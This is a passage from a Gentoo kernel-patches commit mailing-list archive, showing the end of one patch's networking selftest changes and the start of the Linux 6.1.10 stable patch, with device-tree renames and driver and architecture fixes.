++	"  S+  C3:P1:S+    C3    .      .      T      P1     .      .     0 A1:3,A2:3 A1:P1,A2:P-1"
+ 	"  S+ $SETUP_A123_PARTITIONS    .    T:C2-3   .      .      .     0 A1:2-3,A2:2-3,A3:3 A1:P1,A2:P-1,A3:P-1"
+ 	"  S+ $SETUP_A123_PARTITIONS    . T:C2-3:C1-3 .      .      .     0 A1:1,A2:2,A3:3 A1:P1,A2:P1,A3:P1"
+ 
+diff --git a/tools/testing/selftests/filesystems/fat/run_fat_tests.sh b/tools/testing/selftests/filesystems/fat/run_fat_tests.sh
+old mode 100644
+new mode 100755
+diff --git a/tools/testing/selftests/net/udpgso_bench.sh b/tools/testing/selftests/net/udpgso_bench.sh
+index dc932fd653634..640bc43452faa 100755
+--- a/tools/testing/selftests/net/udpgso_bench.sh
++++ b/tools/testing/selftests/net/udpgso_bench.sh
+@@ -7,6 +7,7 @@ readonly GREEN='\033[0;92m'
+ readonly YELLOW='\033[0;33m'
+ readonly RED='\033[0;31m'
+ readonly NC='\033[0m' # No Color
++readonly TESTPORT=8000
+ 
+ readonly KSFT_PASS=0
+ readonly KSFT_FAIL=1
+@@ -56,11 +57,26 @@ trap wake_children EXIT
+ 
+ run_one() {
+ 	local -r args=$@
++	local nr_socks=0
++	local i=0
++	local -r timeout=10
++
++	./udpgso_bench_rx -p "$TESTPORT" &
++	./udpgso_bench_rx -p "$TESTPORT" -t &
++
++	# Wait for the above test program to get ready to receive connections.
++	while [ "$i" -lt "$timeout" ]; do
++		nr_socks="$(ss -lnHi | grep -c "\*:${TESTPORT}")"
++		[ "$nr_socks" -eq 2 ] && break
++		i=$((i + 1))
++		sleep 1
++	done
++	if [ "$nr_socks" -ne 2 ]; then
++		echo "timed out while waiting for udpgso_bench_rx"
++		exit 1
++	fi
+ 
+-	./udpgso_bench_rx &
+-	./udpgso_bench_rx -t &
+-
+-	./udpgso_bench_tx ${args}
++	./udpgso_bench_tx -p "$TESTPORT" ${args}
+ }
+ 
+ run_in_netns() {
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 6a193425c367f..4058c7451e70d 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -250,7 +250,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ static void do_flush_udp(int fd)
+ {
+ 	static char rbuf[ETH_MAX_MTU];
+-	int ret, len, gso_size, budget = 256;
++	int ret, len, gso_size = 0, budget = 256;
+ 
+ 	len = cfg_read_all ? sizeof(rbuf) : 0;
+ 	while (budget--) {
+@@ -336,6 +336,8 @@ static void parse_opts(int argc, char **argv)
+ 			cfg_verify = true;
+ 			cfg_read_all = true;
+ 			break;
++		default:
++			exit(1);
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/net/udpgso_bench_tx.c b/tools/testing/selftests/net/udpgso_bench_tx.c
+index f1fdaa2702913..477392715a9ad 100644
+--- a/tools/testing/selftests/net/udpgso_bench_tx.c
++++ b/tools/testing/selftests/net/udpgso_bench_tx.c
+@@ -62,6 +62,7 @@ static int	cfg_payload_len	= (1472 * 42);
+ static int	cfg_port	= 8000;
+ static int	cfg_runtime_ms	= -1;
+ static bool	cfg_poll;
++static int	cfg_poll_loop_timeout_ms = 2000;
+ static bool	cfg_segment;
+ static bool	cfg_sendmmsg;
+ static bool	cfg_tcp;
+@@ -235,16 +236,17 @@ static void flush_errqueue_recv(int fd)
+ 	}
+ }
+ 
+-static void flush_errqueue(int fd, const bool do_poll)
++static void flush_errqueue(int fd, const bool do_poll,
++			   unsigned long poll_timeout, const bool poll_err)
+ {
+ 	if (do_poll) {
+ 		struct pollfd fds = {0};
+ 		int ret;
+ 
+ 		fds.fd = fd;
+-		ret = poll(&fds, 1, 500);
++		ret = poll(&fds, 1, poll_timeout);
+ 		if (ret == 0) {
+-			if (cfg_verbose)
++			if ((cfg_verbose) && (poll_err))
+ 				fprintf(stderr, "poll timeout\n");
+ 		} else if (ret < 0) {
+ 			error(1, errno, "poll");
+@@ -254,6 +256,20 @@ static void flush_errqueue(int fd, const bool do_poll)
+ 	flush_errqueue_recv(fd);
+ }
+ 
++static void flush_errqueue_retry(int fd, unsigned long num_sends)
++{
++	unsigned long tnow, tstop;
++	bool first_try = true;
++
++	tnow = gettimeofday_ms();
++	tstop = tnow + cfg_poll_loop_timeout_ms;
++	do {
++		flush_errqueue(fd, true, tstop - tnow, first_try);
++		first_try = false;
++		tnow = gettimeofday_ms();
++	} while ((stat_zcopies != num_sends) && (tnow < tstop));
++}
++
+ static int send_tcp(int fd, char *data)
+ {
+ 	int ret, done = 0, count = 0;
+@@ -413,7 +429,8 @@ static int send_udp_segment(int fd, char *data)
+ 
+ static void usage(const char *filepath)
+ {
+-	error(1, 0, "Usage: %s [-46acmHPtTuvz] [-C cpu] [-D dst ip] [-l secs] [-M messagenr] [-p port] [-s sendsize] [-S gsosize]",
++	error(1, 0, "Usage: %s [-46acmHPtTuvz] [-C cpu] [-D dst ip] [-l secs] "
++		    "[-L secs] [-M messagenr] [-p port] [-s sendsize] [-S gsosize]",
+ 		    filepath);
+ }
+ 
+@@ -423,7 +440,7 @@ static void parse_opts(int argc, char **argv)
+ 	int max_len, hdrlen;
+ 	int c;
+ 
+-	while ((c = getopt(argc, argv, "46acC:D:Hl:mM:p:s:PS:tTuvz")) != -1) {
++	while ((c = getopt(argc, argv, "46acC:D:Hl:L:mM:p:s:PS:tTuvz")) != -1) {
+ 		switch (c) {
+ 		case '4':
+ 			if (cfg_family != PF_UNSPEC)
+@@ -452,6 +469,9 @@ static void parse_opts(int argc, char **argv)
+ 		case 'l':
+ 			cfg_runtime_ms = strtoul(optarg, NULL, 10) * 1000;
+ 			break;
++		case 'L':
++			cfg_poll_loop_timeout_ms = strtoul(optarg, NULL, 10) * 1000;
++			break;
+ 		case 'm':
+ 			cfg_sendmmsg = true;
+ 			break;
+@@ -490,6 +510,8 @@ static void parse_opts(int argc, char **argv)
+ 		case 'z':
+ 			cfg_zerocopy = true;
+ 			break;
++		default:
++			exit(1);
+ 		}
+ 	}
+ 
+@@ -677,7 +699,7 @@ int main(int argc, char **argv)
+ 			num_sends += send_udp(fd, buf[i]);
+ 		num_msgs++;
+ 		if ((cfg_zerocopy && ((num_msgs & 0xF) == 0)) || cfg_tx_tstamp)
+-			flush_errqueue(fd, cfg_poll);
++			flush_errqueue(fd, cfg_poll, 500, true);
+ 
+ 		if (cfg_msg_nr && num_msgs >= cfg_msg_nr)
+ 			break;
+@@ -696,7 +718,7 @@ int main(int argc, char **argv)
+ 	} while (!interrupted && (cfg_runtime_ms == -1 || tnow < tstop));
+ 
+ 	if (cfg_zerocopy || cfg_tx_tstamp)
+-		flush_errqueue(fd, true);
++		flush_errqueue_retry(fd, num_sends);
+ 
+ 	if (close(fd))
+ 		error(1, errno, "close");


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-06 12:46 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-06 12:46 UTC (permalink / raw
  To: gentoo-commits

commit:     a2caeaa3d282040a954d3b967fa62e1b3bbbd71b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb  6 12:46:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb  6 12:46:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a2caeaa3

Linux patch 6.1.10

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1009_linux-6.1.10.patch | 855 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 859 insertions(+)

diff --git a/0000_README b/0000_README
index 1f899f11..10671afd 100644
--- a/0000_README
+++ b/0000_README
@@ -79,6 +79,10 @@ Patch:  1008_linux-6.1.9.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.9
 
+Patch:  1009_linux-6.1.10.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.10
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1009_linux-6.1.10.patch b/1009_linux-6.1.10.patch
new file mode 100644
index 00000000..3d6ca3ee
--- /dev/null
+++ b/1009_linux-6.1.10.patch
@@ -0,0 +1,855 @@
+diff --git a/Makefile b/Makefile
+index 3778b422fa113..6e34c942744e3 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 9
++SUBLEVEL = 10
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/imx53-ppd.dts b/arch/arm/boot/dts/imx53-ppd.dts
+index 37d0cffea99c5..70c4a4852256c 100644
+--- a/arch/arm/boot/dts/imx53-ppd.dts
++++ b/arch/arm/boot/dts/imx53-ppd.dts
+@@ -488,7 +488,7 @@
+ 	scl-gpios = <&gpio3 21 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ 
+-	i2c-switch@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9547";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts b/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
+index 42ed4a04a12e2..6280c5e86a124 100644
+--- a/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
++++ b/arch/arm/boot/dts/vf610-zii-dev-rev-b.dts
+@@ -345,7 +345,7 @@
+ };
+ 
+ &i2c2 {
+-	tca9548@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9548";
+ 		pinctrl-0 = <&pinctrl_i2c_mux_reset>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts b/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
+index de79dcfd32e62..ba2001f373158 100644
+--- a/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
++++ b/arch/arm/boot/dts/vf610-zii-dev-rev-c.dts
+@@ -340,7 +340,7 @@
+ };
+ 
+ &i2c2 {
+-	tca9548@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9548";
+ 		pinctrl-0 = <&pinctrl_i2c_mux_reset>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm/mach-omap1/gpio15xx.c b/arch/arm/mach-omap1/gpio15xx.c
+index c675f11de99db..61fa26efd8653 100644
+--- a/arch/arm/mach-omap1/gpio15xx.c
++++ b/arch/arm/mach-omap1/gpio15xx.c
+@@ -11,6 +11,7 @@
+ #include <linux/gpio.h>
+ #include <linux/platform_data/gpio-omap.h>
+ #include <linux/soc/ti/omap1-soc.h>
++#include <asm/irq.h>
+ 
+ #include "irqs.h"
+ 
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
+index 5a8d85a7d1612..bbdf989058ff7 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1012a-qds.dts
+@@ -110,7 +110,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
+index 9b726c2a48426..dda27ed7aaf2b 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1043a-qds.dts
+@@ -89,7 +89,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
+index b2fcbba60d3ac..3b0ed9305f2bd 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1046a-qds.dts
+@@ -88,7 +88,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
+index 41d8b15f25a54..aa52ff73ff9e0 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-qds.dts
+@@ -53,7 +53,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
+index 1bfbce69cc8b7..ee8e932628d17 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-rdb.dts
+@@ -136,7 +136,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts b/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
+index ef6c8967533ef..d4867d6cf47cd 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
++++ b/arch/arm64/boot/dts/freescale/fsl-ls1088a-ten64.dts
+@@ -245,7 +245,7 @@
+ &i2c3 {
+ 	status = "okay";
+ 
+-	i2c-switch@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9540";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
+index f598669e742fc..52c5a43b30a0f 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa-qds.dtsi
+@@ -103,7 +103,7 @@
+ 
+ &i2c0 {
+ 	status = "okay";
+-	pca9547@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x77>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi b/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
+index 3d9647b3da147..537cecb13dd08 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-ls208xa-rdb.dtsi
+@@ -44,7 +44,7 @@
+ 
+ &i2c0 {
+ 	status = "okay";
+-	pca9547@75 {
++	i2c-mux@75 {
+ 		compatible = "nxp,pca9547";
+ 		reg = <0x75>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi b/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
+index afb455210bd07..d32a52ab00a42 100644
+--- a/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
++++ b/arch/arm64/boot/dts/freescale/fsl-lx2160a-cex7.dtsi
+@@ -54,7 +54,7 @@
+ &i2c0 {
+ 	status = "okay";
+ 
+-	i2c-switch@77 {
++	i2c-mux@77 {
+ 		compatible = "nxp,pca9547";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 74c09891600f2..6357078185edd 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -214,7 +214,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c3>;
+ 	status = "okay";
+ 
+-	i2cmux@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9540";
+ 		reg = <0x70>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts b/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
+index 9dda2a1554c32..8614c18b5998c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mq-nitrogen.dts
+@@ -133,7 +133,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	i2cmux@70 {
++	i2c-mux@70 {
+ 		compatible = "nxp,pca9546";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_i2c1_pca9546>;
+@@ -216,7 +216,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c4>;
+ 	status = "okay";
+ 
+-	pca9546: i2cmux@70 {
++	pca9546: i2c-mux@70 {
+ 		compatible = "nxp,pca9546";
+ 		reg = <0x70>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts b/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
+index 5d5aa6537225f..6e6182709d220 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mq-thor96.dts
+@@ -339,7 +339,7 @@
+ 	bus-width = <4>;
+ 	non-removable;
+ 	no-sd;
+-	no-emmc;
++	no-mmc;
+ 	status = "okay";
+ 
+ 	brcmf: wifi@1 {
+@@ -359,7 +359,7 @@
+ 	cd-gpios = <&gpio2 12 GPIO_ACTIVE_LOW>;
+ 	bus-width = <4>;
+ 	no-sdio;
+-	no-emmc;
++	no-mmc;
+ 	disable-wp;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts b/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
+index 07d8dd8160f68..afa883389456c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qxp-mek.dts
+@@ -61,7 +61,7 @@
+ 	pinctrl-0 = <&pinctrl_lpi2c1 &pinctrl_ioexp_rst>;
+ 	status = "okay";
+ 
+-	i2c-switch@71 {
++	i2c-mux@71 {
+ 		compatible = "nxp,pca9646", "nxp,pca9546";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index dbfbb77e9ff57..7e2c0dcc11ab1 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -8,9 +8,6 @@
+ 
+ #include "msm8994.dtsi"
+ 
+-/* Angler's firmware does not report where the memory is allocated */
+-/delete-node/ &cont_splash_mem;
+-
+ / {
+ 	model = "Huawei Nexus 6P";
+ 	compatible = "huawei,angler", "qcom,msm8994";
+@@ -27,6 +24,22 @@
+ 	chosen {
+ 		stdout-path = "serial0:115200n8";
+ 	};
++
++	reserved-memory {
++		#address-cells = <2>;
++		#size-cells = <2>;
++		ranges;
++
++		tzapp_mem: tzapp@4800000 {
++			reg = <0 0x04800000 0 0x1900000>;
++			no-map;
++		};
++
++		removed_region: reserved@6300000 {
++			reg = <0 0x06300000 0 0xD00000>;
++			no-map;
++		};
++	};
+ };
+ 
+ &blsp1_uart2 {
+diff --git a/arch/loongarch/kernel/process.c b/arch/loongarch/kernel/process.c
+index ddb8ba4eb399d..90a5de7463326 100644
+--- a/arch/loongarch/kernel/process.c
++++ b/arch/loongarch/kernel/process.c
+@@ -185,20 +185,14 @@ out:
+ 
+ unsigned long __get_wchan(struct task_struct *task)
+ {
+-	unsigned long pc;
++	unsigned long pc = 0;
+ 	struct unwind_state state;
+ 
+ 	if (!try_get_task_stack(task))
+ 		return 0;
+ 
+-	unwind_start(&state, task, NULL);
+-	state.sp = thread_saved_fp(task);
+-	get_stack_info(state.sp, state.task, &state.stack_info);
+-	state.pc = thread_saved_ra(task);
+-#ifdef CONFIG_UNWINDER_PROLOGUE
+-	state.type = UNWINDER_PROLOGUE;
+-#endif
+-	for (; !unwind_done(&state); unwind_next_frame(&state)) {
++	for (unwind_start(&state, task, NULL);
++	     !unwind_done(&state); unwind_next_frame(&state)) {
+ 		pc = unwind_get_return_address(&state);
+ 		if (!pc)
+ 			break;
+diff --git a/arch/loongarch/kernel/unwind_guess.c b/arch/loongarch/kernel/unwind_guess.c
+index 5afa6064d73e4..0c20e5184de60 100644
+--- a/arch/loongarch/kernel/unwind_guess.c
++++ b/arch/loongarch/kernel/unwind_guess.c
+@@ -25,6 +25,12 @@ void unwind_start(struct unwind_state *state, struct task_struct *task,
+ 	if (regs) {
+ 		state->sp = regs->regs[3];
+ 		state->pc = regs->csr_era;
++	} else if (task && task != current) {
++		state->sp = thread_saved_fp(task);
++		state->pc = thread_saved_ra(task);
++	} else {
++		state->sp = (unsigned long)__builtin_frame_address(0);
++		state->pc = (unsigned long)__builtin_return_address(0);
+ 	}
+ 
+ 	state->task = task;
+diff --git a/arch/loongarch/kernel/unwind_prologue.c b/arch/loongarch/kernel/unwind_prologue.c
+index 4571c3c87cd4c..1c5b65756144d 100644
+--- a/arch/loongarch/kernel/unwind_prologue.c
++++ b/arch/loongarch/kernel/unwind_prologue.c
+@@ -111,12 +111,22 @@ void unwind_start(struct unwind_state *state, struct task_struct *task,
+ 		    struct pt_regs *regs)
+ {
+ 	memset(state, 0, sizeof(*state));
++	state->type = UNWINDER_PROLOGUE;
+ 
+-	if (regs &&  __kernel_text_address(regs->csr_era)) {
+-		state->pc = regs->csr_era;
++	if (regs) {
+ 		state->sp = regs->regs[3];
++		state->pc = regs->csr_era;
+ 		state->ra = regs->regs[1];
+-		state->type = UNWINDER_PROLOGUE;
++		if (!__kernel_text_address(state->pc))
++			state->type = UNWINDER_GUESS;
++	} else if (task && task != current) {
++		state->sp = thread_saved_fp(task);
++		state->pc = thread_saved_ra(task);
++		state->ra = 0;
++	} else {
++		state->sp = (unsigned long)__builtin_frame_address(0);
++		state->pc = (unsigned long)__builtin_return_address(0);
++		state->ra = 0;
+ 	}
+ 
+ 	state->task = task;
+diff --git a/arch/s390/kernel/setup.c b/arch/s390/kernel/setup.c
+index ab19ddb09d65e..2ec5f1e0312fa 100644
+--- a/arch/s390/kernel/setup.c
++++ b/arch/s390/kernel/setup.c
+@@ -507,6 +507,7 @@ static void __init setup_lowcore_dat_on(void)
+ {
+ 	struct lowcore *abs_lc;
+ 	unsigned long flags;
++	int i;
+ 
+ 	__ctl_clear_bit(0, 28);
+ 	S390_lowcore.external_new_psw.mask |= PSW_MASK_DAT;
+@@ -521,8 +522,8 @@ static void __init setup_lowcore_dat_on(void)
+ 	abs_lc = get_abs_lowcore(&flags);
+ 	abs_lc->restart_flags = RESTART_FLAG_CTLREGS;
+ 	abs_lc->program_new_psw = S390_lowcore.program_new_psw;
+-	memcpy(abs_lc->cregs_save_area, S390_lowcore.cregs_save_area,
+-	       sizeof(abs_lc->cregs_save_area));
++	for (i = 0; i < 16; i++)
++		abs_lc->cregs_save_area[i] = S390_lowcore.cregs_save_area[i];
+ 	put_abs_lowcore(abs_lc, flags);
+ }
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index fcf9cf49f5de1..7c91d9195da8d 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -1408,6 +1408,10 @@ retry:
+ 		list_for_each_entry_reverse(blkg, &q->blkg_list, q_node)
+ 			pol->pd_init_fn(blkg->pd[pol->plid]);
+ 
++	if (pol->pd_online_fn)
++		list_for_each_entry_reverse(blkg, &q->blkg_list, q_node)
++			pol->pd_online_fn(blkg->pd[pol->plid]);
++
+ 	__set_bit(pol->plid, q->blkcg_pols);
+ 	ret = 0;
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 63abbe342b28c..83fbc7c546172 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2858,6 +2858,7 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 		struct blk_plug *plug, struct bio **bio, unsigned int nsegs)
+ {
+ 	struct request *rq;
++	enum hctx_type type, hctx_type;
+ 
+ 	if (!plug)
+ 		return NULL;
+@@ -2870,7 +2871,10 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 		return NULL;
+ 	}
+ 
+-	if (blk_mq_get_hctx_type((*bio)->bi_opf) != rq->mq_hctx->type)
++	type = blk_mq_get_hctx_type((*bio)->bi_opf);
++	hctx_type = rq->mq_hctx->type;
++	if (type != hctx_type &&
++	    !(type == HCTX_TYPE_READ && hctx_type == HCTX_TYPE_DEFAULT))
+ 		return NULL;
+ 	if (op_is_flush(rq->cmd_flags) != op_is_flush((*bio)->bi_opf))
+ 		return NULL;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 5c32b318c173d..b48f85c3791e9 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -493,6 +493,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Acer Aspire 4810T */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 4810T"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 5738z */
+diff --git a/drivers/dma/imx-sdma.c b/drivers/dma/imx-sdma.c
+index fbea5f62dd98b..b926abe4fa43a 100644
+--- a/drivers/dma/imx-sdma.c
++++ b/drivers/dma/imx-sdma.c
+@@ -1521,10 +1521,12 @@ static struct sdma_desc *sdma_transfer_init(struct sdma_channel *sdmac,
+ 		sdma_config_ownership(sdmac, false, true, false);
+ 
+ 	if (sdma_load_context(sdmac))
+-		goto err_desc_out;
++		goto err_bd_out;
+ 
+ 	return desc;
+ 
++err_bd_out:
++	sdma_free_bd(desc);
+ err_desc_out:
+ 	kfree(desc);
+ err_out:
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index f818d00bb2c69..ffdad59ec81fc 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -910,6 +910,8 @@ static int do_xfer(const struct scmi_protocol_handle *ph,
+ 			      xfer->hdr.protocol_id, xfer->hdr.seq,
+ 			      xfer->hdr.poll_completion);
+ 
++	/* Clear any stale status */
++	xfer->hdr.status = SCMI_SUCCESS;
+ 	xfer->state = SCMI_XFER_SENT_OK;
+ 	/*
+ 	 * Even though spinlocking is not needed here since no race is possible
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index a7d2358736fe7..fa3de3c3010ce 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -361,7 +361,7 @@ err:
+ }
+ 
+ static bool acpi_gpio_irq_is_wake(struct device *parent,
+-				  struct acpi_resource_gpio *agpio)
++				  const struct acpi_resource_gpio *agpio)
+ {
+ 	unsigned int pin = agpio->pin_table[0];
+ 
+@@ -754,7 +754,7 @@ static int acpi_populate_gpio_lookup(struct acpi_resource *ares, void *data)
+ 		lookup->info.pin_config = agpio->pin_config;
+ 		lookup->info.debounce = agpio->debounce_timeout;
+ 		lookup->info.gpioint = gpioint;
+-		lookup->info.wake_capable = agpio->wake_capable == ACPI_WAKE_CAPABLE;
++		lookup->info.wake_capable = acpi_gpio_irq_is_wake(&lookup->info.adev->dev, agpio);
+ 
+ 		/*
+ 		 * Polarity and triggering are only specified for GpioInt
+@@ -1080,7 +1080,8 @@ int acpi_dev_gpio_irq_wake_get_by(struct acpi_device *adev, const char *name, in
+ 				dev_dbg(&adev->dev, "IRQ %d already in use\n", irq);
+ 			}
+ 
+-			if (wake_capable)
++			/* avoid suspend issues with GPIOs when systems are using S3 */
++			if (wake_capable && acpi_gbl_FADT.flags & ACPI_FADT_LOW_POWER_S0)
+ 				*wake_capable = info.wake_capable;
+ 
+ 			return irq;
+@@ -1599,6 +1600,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
